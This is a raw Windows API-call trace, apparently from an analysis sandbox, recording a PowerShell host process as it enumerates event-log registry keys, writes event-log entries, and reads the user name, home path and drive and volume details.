	[0148.140] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x388) returned 0x0
	[0148.140] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.140] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x38c) returned 0x0
	[0148.141] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.141] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x390) returned 0x0
	[0148.141] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x394) returned 0x0
	[0148.141] RegCloseKey (hKey=0x394) returned 0x0
	[0148.141] RegCloseKey (hKey=0x36c) returned 0x0
	[0148.142] RegCloseKey (hKey=0x390) returned 0x0
	[0148.142] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccfc8 | out: phkResult=0x1ccfc8*=0x390) returned 0x0
	[0148.142] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ccf3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccf38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ccf3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccf38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.142] CoTaskMemFree (pv=0x0) 
	[0148.143] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.143] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.143] CoTaskMemFree (pv=0x3e4db0) 
	[0148.143] CoTaskMemFree (pv=0x0) 
	[0148.143] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.143] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.143] CoTaskMemFree (pv=0x3e4db0) 
	[0148.143] CoTaskMemFree (pv=0x0) 
	[0148.143] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.143] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.143] CoTaskMemFree (pv=0x3e4db0) 
	[0148.143] CoTaskMemFree (pv=0x0) 
	[0148.143] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.143] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.143] CoTaskMemFree (pv=0x3e4db0) 
	[0148.143] CoTaskMemFree (pv=0x0) 
	[0148.143] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.143] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.143] CoTaskMemFree (pv=0x3e4db0) 
	[0148.143] CoTaskMemFree (pv=0x0) 
	[0148.143] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.143] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.143] CoTaskMemFree (pv=0x3e4db0) 
	[0148.143] CoTaskMemFree (pv=0x0) 
	[0148.144] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.144] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.144] CoTaskMemFree (pv=0x3e4db0) 
	[0148.144] CoTaskMemFree (pv=0x0) 
	[0148.144] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.144] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.144] CoTaskMemFree (pv=0x3e4db0) 
	[0148.144] CoTaskMemFree (pv=0x0) 
	[0148.144] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.144] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.144] CoTaskMemFree (pv=0x3e4db0) 
	[0148.144] CoTaskMemFree (pv=0x0) 
	[0148.144] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x36c) returned 0x0
	[0148.144] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.144] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x394) returned 0x0
	[0148.144] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.144] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x398) returned 0x0
	[0148.144] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.145] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x39c) returned 0x0
	[0148.145] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.145] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x3a0) returned 0x0
	[0148.276] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.276] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x388) returned 0x0
	[0148.276] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.276] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x38c) returned 0x0
	[0148.276] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.277] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x39c) returned 0x0
	[0148.277] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.277] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x36c) returned 0x0
	[0148.277] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x320) returned 0x0
	[0148.277] RegCloseKey (hKey=0x320) returned 0x0
	[0148.277] RegCloseKey (hKey=0x390) returned 0x0
	[0148.277] RegCloseKey (hKey=0x36c) returned 0x0
	[0148.279] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccf98 | out: phkResult=0x1ccf98*=0x36c) returned 0x0
	[0148.279] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ccf0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccf08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ccf0c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccf08*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.279] CoTaskMemFree (pv=0x0) 
	[0148.279] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.279] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x3e4db0, lpcchName=0x1ccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.279] CoTaskMemFree (pv=0x3e4db0) 
	[0148.279] CoTaskMemFree (pv=0x0) 
	[0148.279] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.279] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x3e4db0, lpcchName=0x1ccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.280] CoTaskMemFree (pv=0x3e4db0) 
	[0148.280] CoTaskMemFree (pv=0x0) 
	[0148.280] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.280] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x3e4db0, lpcchName=0x1ccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.280] CoTaskMemFree (pv=0x3e4db0) 
	[0148.280] CoTaskMemFree (pv=0x0) 
	[0148.280] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.280] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x3e4db0, lpcchName=0x1ccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.280] CoTaskMemFree (pv=0x3e4db0) 
	[0148.280] CoTaskMemFree (pv=0x0) 
	[0148.280] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.280] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x3e4db0, lpcchName=0x1ccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.280] CoTaskMemFree (pv=0x3e4db0) 
	[0148.280] CoTaskMemFree (pv=0x0) 
	[0148.280] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.280] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x3e4db0, lpcchName=0x1ccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.280] CoTaskMemFree (pv=0x3e4db0) 
	[0148.280] CoTaskMemFree (pv=0x0) 
	[0148.280] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.280] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x3e4db0, lpcchName=0x1ccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.280] CoTaskMemFree (pv=0x3e4db0) 
	[0148.280] CoTaskMemFree (pv=0x0) 
	[0148.280] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.281] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x3e4db0, lpcchName=0x1ccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.281] CoTaskMemFree (pv=0x3e4db0) 
	[0148.281] CoTaskMemFree (pv=0x0) 
	[0148.281] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.281] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x3e4db0, lpcchName=0x1ccf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ccf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.281] CoTaskMemFree (pv=0x3e4db0) 
	[0148.281] CoTaskMemFree (pv=0x0) 
	[0148.281] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x390) returned 0x0
	[0148.281] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x0) returned 0x2
	[0148.281] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x320) returned 0x0
	[0148.281] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x0) returned 0x2
	[0148.281] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x324) returned 0x0
	[0148.281] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x0) returned 0x2
	[0148.282] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x394) returned 0x0
	[0148.282] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x0) returned 0x2
	[0148.282] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x344) returned 0x0
	[0148.282] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x0) returned 0x2
	[0148.282] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x31c) returned 0x0
	[0148.282] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x0) returned 0x2
	[0148.282] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x34c) returned 0x0
	[0148.282] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x0) returned 0x2
	[0148.282] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x350) returned 0x0
	[0148.283] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x0) returned 0x2
	[0148.283] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x354) returned 0x0
	[0148.283] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccff8 | out: phkResult=0x1ccff8*=0x358) returned 0x0
	[0148.283] RegCloseKey (hKey=0x358) returned 0x0
	[0148.283] RegCloseKey (hKey=0x36c) returned 0x0
	[0148.284] RegCloseKey (hKey=0x354) returned 0x0
	[0148.295] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8c0008
	[0148.375] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f8a838*="WSMan", lpRawData=0x2f8a5a8) returned 1
	[0148.376] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0148.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.376] CoTaskMemFree (pv=0x1b7da9c0) 
	[0148.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.379] CoTaskMemAlloc (cb=0x804) returned 0x1b7f7950
	[0148.379] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f7950, nSize=0x1cd288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd288) returned 0x1
	[0148.379] CoTaskMemFree (pv=0x1b7f7950) 
	[0148.379] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.379] GetUserNameW (in: lpBuffer=0x3e4db0, pcbBuffer=0x1cd2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd2c8) returned 1
	[0148.380] CoTaskMemFree (pv=0x3e4db0) 
	[0148.380] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f90218*="Alias", lpRawData=0x2f8ffa8) returned 1
	[0148.381] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0148.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.381] CoTaskMemFree (pv=0x1b7da9c0) 
	[0148.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0148.384] CoTaskMemAlloc (cb=0x804) returned 0x1b7f7950
	[0148.384] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f7950, nSize=0x1cd288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd288) returned 0x1
	[0148.384] CoTaskMemFree (pv=0x1b7f7950) 
	[0148.384] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.384] GetUserNameW (in: lpBuffer=0x3e4db0, pcbBuffer=0x1cd2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd2c8) returned 1
	[0148.385] CoTaskMemFree (pv=0x3e4db0) 
	[0148.386] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f95810*="Environment", lpRawData=0x2f955a0) returned 1
	[0148.388] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0148.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.388] CoTaskMemFree (pv=0x1b7da9c0) 
	[0148.389] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0148.389] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0148.389] CoTaskMemFree (pv=0x1b7da9c0) 
	[0148.389] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0148.389] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0148.389] CoTaskMemFree (pv=0x1b7da9c0) 
	[0148.390] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1cce30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0148.390] SetErrorMode (uMode=0x1) returned 0x1
	[0148.390] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1cd040 | out: lpFileInformation=0x1cd040*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0148.390] SetErrorMode (uMode=0x1) returned 0x1
	[0148.391] GetLogicalDrives () returned 0x4
	[0148.391] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0148.392] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.392] SetErrorMode (uMode=0x1) returned 0x1
	[0148.392] CoTaskMemAlloc (cb=0x68) returned 0x1b7f0e70
	[0148.392] CoTaskMemAlloc (cb=0x68) returned 0x1b7f1110
	[0148.392] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b7f0e70, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1cd010, lpMaximumComponentLength=0x1cd00c, lpFileSystemFlags=0x1cd008, lpFileSystemNameBuffer=0x1b7f1110, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cd010*=0x9c354b42, lpMaximumComponentLength=0x1cd00c*=0xff, lpFileSystemFlags=0x1cd008*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0148.393] CoTaskMemFree (pv=0x1b7f0e70) 
	[0148.393] CoTaskMemFree (pv=0x1b7f1110) 
	[0148.393] SetErrorMode (uMode=0x1) returned 0x1
	[0148.393] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
